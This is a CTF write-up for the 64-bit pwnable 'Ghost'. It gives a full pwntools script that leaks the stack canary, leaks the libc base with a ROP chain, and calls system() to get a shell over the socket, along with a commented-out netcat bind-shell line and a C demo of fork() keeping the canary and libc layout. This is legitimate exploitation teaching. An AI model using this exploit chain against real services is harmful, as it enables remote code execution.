Pwnable - Ghost (440)
It is just a 64-bit ROP problem.
Because the server uses fork(), the library addresses and the stack canary do not change for as long as the process is running: every child inherits the same values, so anything leaked in one connection is still valid in the next.
RELRO is enabled, so the GOT cannot be overwritten; instead, leak the canary, leak the libc base, compute the address of system from it, and get a shell.
```python
from pwn import *

e = ELF('./ghost')

# ROP gadgets taken from the binary (no PIE, so fixed addresses)
p_rdi = 0x4015b3       # pop rdi ; ret
p_rsi_r15 = 0x4015b1   # pop rsi ; pop r15 ; ret
p_rdx = 0x40153d       # pop rdx ; ret
offset = 0x20740       # __libc_start_main offset in the target libc

#cmd = 'nc -lvp 5555 -e /bin/sh'
# fd 4 is the client socket in the forked child, so redirect the shell to it
cmd = '/bin/sh 0>&4 1>&4 2>&4;'

def set():
    # walk the menu to the point where the overflowing input is read
    s.sendlineafter('? ', 'y')
    for i in range(3):
        s.sendlineafter('choice) : ', '1')
    s.sendlineafter('choice) : ', '2')
    for i in range(2):
        s.sendlineafter('choice) : ', '6')
    s.sendlineafter('choice) : ', '3')
    s.sendlineafter('choice) : ', '4')
    s.sendlineafter('choice) : ', '5')
    s.sendlineafter('choice) : ', '6')

# 1) canary leak: the same canary is reused by every forked child
s = remote('localhost', 9999)
set()
s.sendafter('Chance : ', 'A'*200)
s.recvuntil('A'*200)
canary = u64(s.recv(8))
print('canary : ' + hex(canary))
s.close()

# 2) libc leak: write(4, got[__libc_start_main], 8) via ROP
s = remote('localhost', 9999)
set()
payload = ''
payload += 'A'*200
payload += p64(canary)
payload += 'A'*8                 # saved rbp
payload += p64(p_rdi)
payload += p64(4)                # rdi = client socket fd
payload += p64(p_rsi_r15)
payload += p64(e.got['__libc_start_main']) #0x602F90
payload += 'AAAAAAAA'            # junk for r15
payload += p64(p_rdx)
payload += p64(8)                # rdx = 8 bytes
payload += p64(e.plt['write'])
s.sendafter('Chance : ', payload)
s.recvuntil(p64(canary))
base = u64(s.recv(8)) - 0x20740
print('libc_base : ' + hex(base))
s.close()

# 3) read the command into .bss, then call system(bss)
s = remote('localhost', 9999)
set()
payload = ''
payload += 'A'*200
payload += p64(canary)
payload += 'A'*8
payload += p64(p_rdi)
payload += p64(4)                # read from the client socket
payload += p64(p_rsi_r15)
payload += p64(e.bss())
payload += 'AAAAAAAA'
payload += p64(p_rdx)
payload += p64(len(cmd)+1)
payload += p64(e.plt['read'])
payload += p64(p_rdi)
payload += p64(e.bss())
payload += p64(base+0x45390)     # system() in the target libc
s.sendafter('Chance : ', payload)
s.recv(1024)
s.sendline(cmd)
s.interactive()
```
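The reason the leaked canary and libc address survive across connections is the fork() point made above. The following C program, an added example that is not part of the original write-up, forks like the challenge server and compares the child's stack guard (read from %fs:0x28 on x86-64 Linux/glibc) and libc mapping with the parent's; it assumes a glibc x86-64 target and is why a forking service should re-exec per connection to get fresh values.

```c
// Added example (not from the original write-up): a fork()-based service hands
// every child the parent's stack canary and library mapping, so a value leaked
// from one connection is still valid in the next. Linux x86-64, glibc assumed.
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <unistd.h>

struct snapshot {
    uintptr_t canary;   /* stack-protector guard, kept at %fs:0x28 on x86-64 */
    uintptr_t libc;     /* address of a libc function, i.e. the libc mapping */
};

static struct snapshot take_snapshot(void) {
    struct snapshot s;
    __asm__ volatile ("mov %%fs:0x28, %0" : "=r"(s.canary));
    s.libc = (uintptr_t)&puts;
    return s;
}

/* Fork like the challenge server and compare the child's values with the
 * parent's. Returns 1 when canary and libc address are both identical,
 * 0 when they differ, -1 on a system call failure. */
int child_inherits_secrets(void) {
    int fd[2];
    if (pipe(fd) != 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {                       /* child: report its own view */
        struct snapshot c = take_snapshot();
        if (write(fd[1], &c, sizeof c) != (ssize_t)sizeof c) _exit(1);
        _exit(0);
    }
    close(fd[1]);
    struct snapshot child, parent = take_snapshot();
    ssize_t n = read(fd[0], &child, sizeof child);
    close(fd[0]);
    waitpid(pid, NULL, 0);
    if (n != (ssize_t)sizeof child) return -1;
    return child.canary == parent.canary && child.libc == parent.libc;
}

int main(void) {
    printf("child inherits canary and libc base: %s\n",
           child_inherits_secrets() == 1 ? "yes" : "no");
    return 0;
}
```

Only an execve() of a fresh image gives the child a new canary and new ASLR layout; fork() alone never does.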